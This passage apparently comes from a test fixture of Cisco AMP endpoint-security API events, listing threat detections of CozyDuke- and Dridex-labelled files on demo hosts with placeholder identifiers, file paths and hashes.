Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6156292803669262358","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"player.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\player.exe","identity":{"sha256":"01468b1d3e089985a4ed255b6594d24863cfd94a647329c631e4f4e52759f8a9"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292803669262000,"timestamp":1610704872,"timestamp_nanoseconds":13000000,"date":"2021-01-15T10:01:12+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6156292803669262357","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"player.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\player.exe","identity":{"sha256":"01468b1d3e089985a4ed255b6594d24863cfd94a647329c631e4f4e52759f8a9"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292799374295000,"timestamp":1610704871,"timestamp_nanoseconds":984000000,"date":"2021-01-15T10:01:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Generic:Cozer.18fv.1201","detection_id":"6156292799374295059","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"atiumdag.dll","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\ATI_Subsystem\\atiumdag.dll","identity":{"sha256":"8853979fce0f767b495abd55b696203209e95f04aaefe16c52c1724d07972154","sha1":"883292f00e5836f99a1943a6e0164d8c6c124478","md5":"bc626c8f11ed753f33ad1c0fe848d898"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292799374295000,"timestamp":1610704871,"timestamp_nanoseconds":942000000,"date":"2021-01-15T10:01:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Generic:KCX.18fv.1201","detection_id":"6156292799374295058","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"player.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\player.exe","identity":{"sha256":"01468b1d3e089985a4ed255b6594d24863cfd94a647329c631e4f4e52759f8a9"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292799374295000,"timestamp":1610704871,"timestamp_nanoseconds":937000000,"date":"2021-01-15T10:01:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.0DC7438BE5-100.SBX.VIOC","detection_id":"6156292799374295057","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"player.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\player.exe","identity":{"sha256":"01468b1d3e089985a4ed255b6594d24863cfd94a647329c631e4f4e52759f8a9"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292799374295000,"timestamp":1610704871,"timestamp_nanoseconds":931000000,"date":"2021-01-15T10:01:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Generic:Cozer.18fv.1201","detection_id":"6156292799374295056","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"player.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\player.exe","identity":{"sha256":"01468b1d3e089985a4ed255b6594d24863cfd94a647329c631e4f4e52759f8a9"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292799374295000,"timestamp":1610704871,"timestamp_nanoseconds":917000000,"date":"2021-01-15T10:01:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Generic:CozyDukeB.18fx.1201","detection_id":"6156292799374295055","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"player.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\player.exe","identity":{"sha256":"01468b1d3e089985a4ed255b6594d24863cfd94a647329c631e4f4e52759f8a9"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292799374295000,"timestamp":1610704871,"timestamp_nanoseconds":863000000,"date":"2021-01-15T10:01:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Generic:CozyDukeB.18fx.1201","detection_id":"6156292799374295054","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"player.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\player.exe","identity":{"sha256":"01468b1d3e089985a4ed255b6594d24863cfd94a647329c631e4f4e52759f8a9"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292799374295000,"timestamp":1610704871,"timestamp_nanoseconds":776000000,"date":"2021-01-15T10:01:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Generic:CozyDukeB.18fx.1201","detection_id":"6156292799374295053","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"player.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\player.exe","identity":{"sha256":"01468b1d3e089985a4ed255b6594d24863cfd94a647329c631e4f4e52759f8a9"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292799374295000,"timestamp":1610704871,"timestamp_nanoseconds":767000000,"date":"2021-01-15T10:01:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Generic:CozyDukeB.18fx.1201","detection_id":"6156292799374295052","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"player.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\player.exe","identity":{"sha256":"01468b1d3e089985a4ed255b6594d24863cfd94a647329c631e4f4e52759f8a9"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292799374295000,"timestamp":1610704871,"timestamp_nanoseconds":762000000,"date":"2021-01-15T10:01:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Generic:CozyDukeB.18fx.1201","detection_id":"6156292799374295051","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"player.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\player.exe","identity":{"sha256":"01468b1d3e089985a4ed255b6594d24863cfd94a647329c631e4f4e52759f8a9"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292799374295000,"timestamp":1610704871,"timestamp_nanoseconds":757000000,"date":"2021-01-15T10:01:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Generic:CozyDukeB.18fx.1201","detection_id":"6156292799374295050","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"player.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\player.exe","identity":{"sha256":"01468b1d3e089985a4ed255b6594d24863cfd94a647329c631e4f4e52759f8a9"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292799374295000,"timestamp":1610704871,"timestamp_nanoseconds":711000000,"date":"2021-01-15T10:01:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Generic:CozyDukeB.18fx.1201","detection_id":"6156292799374295049","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"player.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\player.exe","identity":{"sha256":"01468b1d3e089985a4ed255b6594d24863cfd94a647329c631e4f4e52759f8a9"},"parent":{"process_id":3052,"disposition":"Malicious","file_name":"monkeys.swf.exe","identity":{"sha256":"7fd72a36f7e0e6e0a8bc777fc9ed41e0a6d5526c98bc95a09e189531cf7e70d5","sha1":"75aeaee253b5c8ae701195e3b0f49308f3d1d932","md5":"95b3ec0a4e539efaa1faa3d4e25d51de"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955900023001000,"timestamp":1610704869,"timestamp_nanoseconds":23000000,"date":"2021-01-15T10:01:09+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"W32.GenericKD:CozyDukeB.18f0.1201","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610704869,"start_date":"2021-01-15T10:01:09+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"7fd72a36f7e0e6e0a8bc777fc9ed41e0a6d5526c98bc95a09e189531cf7e70d5"},"parent":{"disposition":"Clean","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292782194426000,"timestamp":1610704867,"timestamp_nanoseconds":497000000,"date":"2021-01-15T10:01:07+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Generic:CozyDukeB.18fx.1201","detection_id":"6156292782194425864","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"monkeys.swf.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Downloads\\monkeys\\monkeys.swf.exe","identity":{"sha256":"7fd72a36f7e0e6e0a8bc777fc9ed41e0a6d5526c98bc95a09e189531cf7e70d5","sha1":"75aeaee253b5c8ae701195e3b0f49308f3d1d932","md5":"95b3ec0a4e539efaa1faa3d4e25d51de"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156208033899741000,"timestamp":1610704866,"timestamp_nanoseconds":800000000,"date":"2021-01-15T10:01:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156208033899741198","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292777899459000,"timestamp":1610704866,"timestamp_nanoseconds":500000000,"date":"2021-01-15T10:01:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6156292777899458567","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"monkeys.swf.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Downloads\\monkeys\\monkeys.swf.exe","identity":{"sha256":"7fd72a36f7e0e6e0a8bc777fc9ed41e0a6d5526c98bc95a09e189531cf7e70d5","sha1":"75aeaee253b5c8ae701195e3b0f49308f3d1d932","md5":"95b3ec0a4e539efaa1faa3d4e25d51de"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292777899459000,"timestamp":1610704866,"timestamp_nanoseconds":98000000,"date":"2021-01-15T10:01:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.GenericKD:CozyDukeB.18f0.1201","detection_id":"6156292773604491270","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"monkeys.swf.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Downloads\\monkeys\\monkeys.swf.exe","identity":{"sha256":"7fd72a36f7e0e6e0a8bc777fc9ed41e0a6d5526c98bc95a09e189531cf7e70d5","sha1":"75aeaee253b5c8ae701195e3b0f49308f3d1d932","md5":"95b3ec0a4e539efaa1faa3d4e25d51de"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292777899459000,"timestamp":1610704866,"timestamp_nanoseconds":82000000,"date":"2021-01-15T10:01:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Generic:CozyDukeB.18fx.1201","detection_id":"6156292773604491269","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"monkeys.swf.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Downloads\\monkeys\\monkeys.swf.exe","identity":{"sha256":"7fd72a36f7e0e6e0a8bc777fc9ed41e0a6d5526c98bc95a09e189531cf7e70d5","sha1":"75aeaee253b5c8ae701195e3b0f49308f3d1d932","md5":"95b3ec0a4e539efaa1faa3d4e25d51de"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292777899459000,"timestamp":1610704866,"timestamp_nanoseconds":51000000,"date":"2021-01-15T10:01:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.GenericKD:CozyDukeB.18f0.1201","detection_id":"6156292773604491268","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"monkeys.swf.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Downloads\\monkeys\\monkeys.swf.exe","identity":{"sha256":"7fd72a36f7e0e6e0a8bc777fc9ed41e0a6d5526c98bc95a09e189531cf7e70d5","sha1":"75aeaee253b5c8ae701195e3b0f49308f3d1d932","md5":"95b3ec0a4e539efaa1faa3d4e25d51de"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292773604491000,"timestamp":1610704865,"timestamp_nanoseconds":708000000,"date":"2021-01-15T10:01:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.GenericKD:CozyDukeB.18f0.1201","detection_id":"6156292773604491267","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"monkeys.swf.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Downloads\\monkeys\\monkeys.swf.exe","identity":{"sha256":"7fd72a36f7e0e6e0a8bc777fc9ed41e0a6d5526c98bc95a09e189531cf7e70d5","sha1":"75aeaee253b5c8ae701195e3b0f49308f3d1d932","md5":"95b3ec0a4e539efaa1faa3d4e25d51de"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156292773604491000,"timestamp":1610704865,"timestamp_nanoseconds":427000000,"date":"2021-01-15T10:01:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.GenericKD:CozyDukeB.18f0.1201","detection_id":"6156292773604491266","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CozyDuke","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"61:24:2f:67:93:6e"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"monkeys.swf.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Downloads\\monkeys\\monkeys.swf.exe","identity":{"sha256":"7fd72a36f7e0e6e0a8bc777fc9ed41e0a6d5526c98bc95a09e189531cf7e70d5","sha1":"75aeaee253b5c8ae701195e3b0f49308f3d1d932","md5":"95b3ec0a4e539efaa1faa3d4e25d51de"},"parent":{"process_id":3660,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156208003834970000,"timestamp":1610704859,"timestamp_nanoseconds":47000000,"date":"2021-01-15T10:00:59+00:00","event_type":"Threat 